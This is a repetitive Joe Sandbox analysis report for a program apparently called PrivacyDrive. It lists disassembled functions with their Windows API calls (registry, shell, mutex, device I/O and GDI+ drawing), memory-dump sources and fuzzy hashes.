                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseCriticalDeleteHandleSection
                                • String ID: <,X$<,X
                                • API String ID: 1370521891-3556952042
                                • Opcode ID: de776cba25faf2730d988c9ba960061ed55d5fb4e8effe73e671f8035add70eb
                                • Instruction ID: 8c59a083403ac473de118185c29afedb6f71d19fe6a6320f31f613d6141e5874
                                • Opcode Fuzzy Hash: de776cba25faf2730d988c9ba960061ed55d5fb4e8effe73e671f8035add70eb
                                • Instruction Fuzzy Hash: 1B11A0B5904718EBDB20CF54C90879EBBF8FB15724F108B1EE865933C0D7B9AA048B84
                                Function 0041CB70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 0041CB91
                                • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000004,00000004,?,?,00000000,00020019,?), ref: 0041CBB6
                                • RegCloseKey.ADVAPI32(?,?,00000000,00020019,?), ref: 0041CBCF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Start
                                • API String ID: 3677997916-1589148299
                                • Opcode ID: 3826f259bfbeb2682d6ba904f0090098df3d3910d28e1a3ede899ecdc063f863
                                • Instruction ID: 60634d18d2b34d08243063aef7d1045a78b31859e97de2cd2e60992242298721
                                • Opcode Fuzzy Hash: 3826f259bfbeb2682d6ba904f0090098df3d3910d28e1a3ede899ecdc063f863
                                • Instruction Fuzzy Hash: B5F01D7094121CFBDB118F90DC4AEEABB6CEB14755F104066FD04D2150D2719E58DBD0
                                Function 00413100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000000), ref: 00413141
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413158
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteFileInfoShell
                                • String ID: :\$open
                                • API String ID: 1133623499-1518230227
                                • Opcode ID: 32030abe5b6b5a0b7e82afceee751789d6d9b24d76d1d0de1a37681a463aeea6
                                • Instruction ID: b7703ac5843652f046152170b7ecde8b283b9c93cdaa8f15a7c76f12125bb424
                                • Opcode Fuzzy Hash: 32030abe5b6b5a0b7e82afceee751789d6d9b24d76d1d0de1a37681a463aeea6
                                • Instruction Fuzzy Hash: 07F0E175E4030CABEB00DF94DC96F9DB7B8BB18704F008456FA05DB290D6B46A04DB55
                                Function 0042B990 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexW.KERNEL32(00000000,00000001,_Privacy Drive UI,?,0040FD27), ref: 0042B9A3
                                • GetLastError.KERNEL32(?,0040FD27), ref: 0042B9B2
                                • CloseHandle.KERNEL32(?,0040FD27), ref: 0042B9C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseCreateErrorHandleLastMutex
                                • String ID: _Privacy Drive UI
                                • API String ID: 4294037311-2587878715
                                • Opcode ID: 96e8bc22e1efc1a7884ccdf22b9db723226ea2e679a83071e2ca0c449a83962e
                                • Instruction ID: f5842279c6bb8cc4d488050af91dd673a3f740bef71acf62abc57e123ad988ee
                                • Opcode Fuzzy Hash: 96e8bc22e1efc1a7884ccdf22b9db723226ea2e679a83071e2ca0c449a83962e
                                • Instruction Fuzzy Hash: 95E0923770823187E7916B14BC4878A7BB0E725B23F000023F504D16A1D7669CC6B7E0
                                Function 00441240 Relevance: 6.5, APIs: 4, Instructions: 471COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00540118,000000FF), ref: 0044127F
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 00441386
                                  • Part of subcall function 004CC050: GdipCreateSolidFill.GDIPLUS(?,FF414141,7563D392,?,?,?), ref: 004CC0A9
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?,?), ref: 004CC121
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,?,?), ref: 004CC18D
                                  • Part of subcall function 004CC050: GdipDeleteBrush.GDIPLUS(?,?,?,?), ref: 004CC1A9
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,00000000,?,?,00000016,?,FF414141,?,00000000,?,?,00000016,?,FF414141), ref: 00441865
                                • GdipDeleteStringFormat.GDIPLUS(?,?,0000007E,00000036,?,00000016,?,FF414141), ref: 004418BF
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$AlignCreateDeleteDraw$BrushFillSolid
                                • String ID:
                                • API String ID: 1713294839-0
                                • Opcode ID: 0bdef8727a6907d0153510461fa6637eb7a5a1145e2b71ab58448d540323ba17
                                • Instruction ID: 5ba4bf7f39ff79144ff88382843ad214eba5f59aea84957b257ca6e8f98e291d
                                • Opcode Fuzzy Hash: 0bdef8727a6907d0153510461fa6637eb7a5a1145e2b71ab58448d540323ba17
                                • Instruction Fuzzy Hash: 222225B5204702EFD714CF28C884E96BBE8FF59364F04461EF8A8972A1D734E954CBA5
                                Function 004A72E0 Relevance: 6.2, APIs: 4, Instructions: 161windowCOMMON
                                Download Yara Rule
                                APIs
                                • DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • DeviceIoControl.KERNEL32(?,07770C84,?,00000295,?,00000295,?,00000000), ref: 004A7481
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A74A0
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ControlDeviceMessagePeek$_malloc
                                • String ID:
                                • API String ID: 706846246-0
                                • Opcode ID: a33365cb78780a06058904eb9aa3c6e270a0e606a8900395005601a07d047d99
                                • Instruction ID: 3249e15b07e49eda3519ea353384b7fef2f1e193b73757c876742ef21707c496
                                • Opcode Fuzzy Hash: a33365cb78780a06058904eb9aa3c6e270a0e606a8900395005601a07d047d99
                                • Instruction Fuzzy Hash: 29518171A40318ABDB10DF94CC49BEEBBB8FF19714F14412AE904BB2C0D7B59944CBA5
                                Function 0040EBF0 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$MessagePeek$EnterLeave$ControlDevice
                                • String ID:
                                • API String ID: 1761629311-0
                                • Opcode ID: 50eb8d550ca9fab826c1c576e8405ead69e538d43f3e1a971e56d8a460e38ef5
                                • Instruction ID: 3f2fff9c139d75d78497a8398bee76ca9fda80a0dbc039c50f9e302af8190350
                                • Opcode Fuzzy Hash: 50eb8d550ca9fab826c1c576e8405ead69e538d43f3e1a971e56d8a460e38ef5
                                • Instruction Fuzzy Hash: BC51BF306187019FD724DF26D847BAAB7E4FF59318F140A2EE45AA22D1EB387814CB56
                                Function 00448370 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                Download Yara Rule
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 004483E6
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 00448404
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 0044841C
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000014,?,FF414141,?,00000000,?,?,00000014,?,FF414141,?), ref: 00448505
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteDrawImage
                                • String ID:
                                • API String ID: 3591613321-0
                                • Opcode ID: 9284a02a76feb8575200f451f57aa82c024adf050106ac514a1b3fb2f394b86b
                                • Instruction ID: 3aa694b5bc46787fb8de9f3df625cf2318682f59eeca7f70602fcc19d3cd1175
                                • Opcode Fuzzy Hash: 9284a02a76feb8575200f451f57aa82c024adf050106ac514a1b3fb2f394b86b
                                • Instruction Fuzzy Hash: 7D518B71204702EFE704CF28C884F9ABBE4FF99714F044A1DF559972A1DB70A858CBA5
                                Function 004CC050 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateSolidFill.GDIPLUS(?,FF414141,7563D392,?,?,?), ref: 004CC0A9
                                • GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?,?), ref: 004CC121
                                • GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,?,?), ref: 004CC18D
                                • GdipDeleteBrush.GDIPLUS(?,?,?,?), ref: 004CC1A9
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$DrawString$BrushCreateDeleteFillSolid
                                • String ID:
                                • API String ID: 4101622418-0
                                • Opcode ID: a057df0e225cbec0be139d0a3cd83048824a49fd74ded992ac97cc4dc7caadf8
                                • Instruction ID: e0038b9d0685308181ed090feaf07842e71fd62a4c13406fe1d76e7a4da1b15f
                                • Opcode Fuzzy Hash: a057df0e225cbec0be139d0a3cd83048824a49fd74ded992ac97cc4dc7caadf8
                                • Instruction Fuzzy Hash: 30413B75A11249DFCB01CF65C880AAEFBB4FF99310F24831AE815B7290E774A894DF54
                                Function 004A45C0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00000108,7563D392,?,00000000,00549910,000000FF), ref: 004A4655
                                • GdipSetStringFormatAlign.GDIPLUS(00000108,00000001), ref: 004A4775
                                • GdipSetStringFormatLineAlign.GDIPLUS(00000108,00000001), ref: 004A4786
                                • GdipSetStringFormatFlags.GDIPLUS(00000108,00001000), ref: 004A479A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatGdipString$Align$CreateFlagsLine
                                • String ID:
                                • API String ID: 1889025379-0
                                • Opcode ID: 9a33e5de6ce44d720b9f1d21e40e3fb45c2cd3d00268d004783f2499a8b94922
                                • Instruction ID: 9f84e90830f94faacd2501bb9ba1cd19f040a3c7652e415f549aa93534a9ad48
                                • Opcode Fuzzy Hash: 9a33e5de6ce44d720b9f1d21e40e3fb45c2cd3d00268d004783f2499a8b94922
                                • Instruction Fuzzy Hash: EF5103B0901245EEEB05CF64C91879ABFF4FF16318F20819DD458AF291D3BA9A09DB90
                                Function 00405790 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                Download Yara Rule
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 00405806
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 00405824
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 0040583C
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000014,?,FF414141,?,00000000,?,?,00000014,?,FF414141), ref: 004058E8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteDrawImage
                                • String ID:
                                • API String ID: 3591613321-0
                                • Opcode ID: d00f998c11ac61cd296428be644efa1bda2d23061c00ad08345528ef6af7aa34
                                • Instruction ID: d8e03f417fab26d0fd3c56658cd6eaed55c8c9658f2d95a917befea81812e60a
                                • Opcode Fuzzy Hash: d00f998c11ac61cd296428be644efa1bda2d23061c00ad08345528ef6af7aa34
                                • Instruction Fuzzy Hash: 26418975204702EFD704CF28C884F56BBE4FF89314F044A2DF859A72A1EB30A858CBA5
                                Function 00433AF0 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowPos.USER32(00000000), ref: 00433B31
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 00433B8B
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 00433BC2
                                • PostMessageW.USER32(00000000), ref: 00433C22
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$ClearExceptionException@8GraphicsMessageModePostRaiseSmoothingThrowWindow
                                • String ID:
                                • API String ID: 1584724456-0
                                • Opcode ID: 350d0b1ebf2840fe0e6eb4b4557aa91bd640ab14a29ced17a7b4c5d9194db5c0
                                • Instruction ID: a23faa046682134fe9f5992f1062a70345bf03b543eb0c0b445da283bad3658d
                                • Opcode Fuzzy Hash: 350d0b1ebf2840fe0e6eb4b4557aa91bd640ab14a29ced17a7b4c5d9194db5c0
                                • Instruction Fuzzy Hash: 46415471208701AFD310CF28C859F5BBBE8EB89714F100A1DF5959B2A1DBB5A848CB96
                                Function 0043AAF0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043AB57
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0043AB8C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043ABE4
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0043AC19
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: ca9cac723e31787bfe5be79c51fe014e60282ef1d2478efcf86b17f5c190c6ba
                                • Instruction ID: 60864689c4e3d1ce9a2d98c09cd661325c7d2e7e53449e5ba5033771e5d2dc07
                                • Opcode Fuzzy Hash: ca9cac723e31787bfe5be79c51fe014e60282ef1d2478efcf86b17f5c190c6ba
                                • Instruction Fuzzy Hash: 58414F756043069FCB14CF19D894B5ABBE5FF88300F04896EF9899B361D730E819CBA6
                                Function 0043A980 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043A9E7
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0043AA1C
                                • GdipGetImageHeight.GDIPLUS(?,?,?,00000000,00000000), ref: 0043AA73
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0043AAA8
